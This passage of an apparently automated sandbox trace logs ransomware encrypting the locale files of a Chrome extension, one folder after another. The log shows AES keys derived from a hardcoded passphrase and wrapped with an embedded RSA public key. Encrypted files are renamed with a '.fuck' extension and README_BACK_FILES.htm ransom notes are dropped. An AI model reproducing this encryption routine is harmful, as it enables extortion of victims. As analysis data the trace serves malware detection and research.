dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.384] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.384] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.387] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.387] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.387] CryptHashData (hHash=0x2984760, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.387] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2984760, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.387] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.387] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.387] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298bcf0) returned 1 [0252.387] CryptImportPublicKeyInfo (in: hCryptProv=0x298bcf0, dwCertEncodingType=0x1, pInfo=0x2993c90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993cc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993cc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984f20) returned 1 [0252.387] CryptEncrypt (in: hKey=0x2984f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.387] CryptEncrypt (in: hKey=0x2984f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298be88*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298be88*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.388] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298be88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298be88*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.389] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.390] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.390] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.390] CloseHandle (hObject=0x5d64) returned 1 [0252.390] CloseHandle (hObject=0x5d5c) returned 1 [0252.391] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0252.394] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0252.394] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.gsg")) returned 1 [0252.395] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.fuck")) returned 1 [0252.406] CryptDestroyHash (hHash=0x2984760) returned 1 [0252.406] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.406] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.406] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.406] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.406] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0252.406] AreFileApisANSI () returned 1 [0252.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.406] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.407] GetFileType (hFile=0x5d60) returned 0x1 [0252.407] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.408] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.408] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.408] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.408] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.408] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.408] GetLastError () returned 0x0 [0252.408] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json")) returned 0x20 [0252.409] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json", dwFileAttributes=0x80) returned 1 [0252.409] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.409] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.410] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.411] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.413] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.413] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.413] CryptHashData (hHash=0x29846a0, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.413] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.413] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.413] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.413] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298bbe0) returned 1 [0252.413] CryptImportPublicKeyInfo (in: hCryptProv=0x298bbe0, dwCertEncodingType=0x1, pInfo=0x2993540*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993570*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993578*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984960) returned 1 [0252.414] CryptEncrypt (in: hKey=0x2984960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.414] CryptEncrypt (in: hKey=0x2984960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298bf10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298bf10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.414] WriteFile (in: hFile=0x5d64, lpBuffer=0x298bf10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298bf10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.415] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.416] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.416] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.416] CloseHandle (hObject=0x5d5c) returned 1 [0252.416] CloseHandle (hObject=0x5d64) returned 1 [0252.416] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), bFailIfExists=0) returned 1 [0252.419] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json", dwFileAttributes=0x0) returned 1 [0252.420] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.gsg")) returned 1 [0252.421] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.fuck")) returned 1 [0252.422] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.422] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.422] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.422] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.422] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.422] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\readme_back_files.htm")) returned 0xffffffff [0252.422] AreFileApisANSI () returned 1 [0252.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.422] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.423] GetFileType (hFile=0x5d60) returned 0x1 [0252.423] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.424] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.424] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.424] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.424] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.424] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.425] GetLastError () returned 0x0 [0252.425] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json")) returned 0x20 [0252.425] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json", dwFileAttributes=0x80) returned 1 [0252.426] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.426] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.427] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.428] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.430] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.430] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.430] CryptHashData (hHash=0x29846a0, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.430] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.430] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.430] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.430] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298c1b8) returned 1 [0252.431] CryptImportPublicKeyInfo (in: hCryptProv=0x298c1b8, dwCertEncodingType=0x1, pInfo=0x29943e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994410*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994418*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984ca0) returned 1 [0252.431] CryptEncrypt (in: hKey=0x2984ca0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.431] CryptEncrypt (in: hKey=0x2984ca0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298c240*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298c240*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.431] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298c240*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298c240*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.432] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, 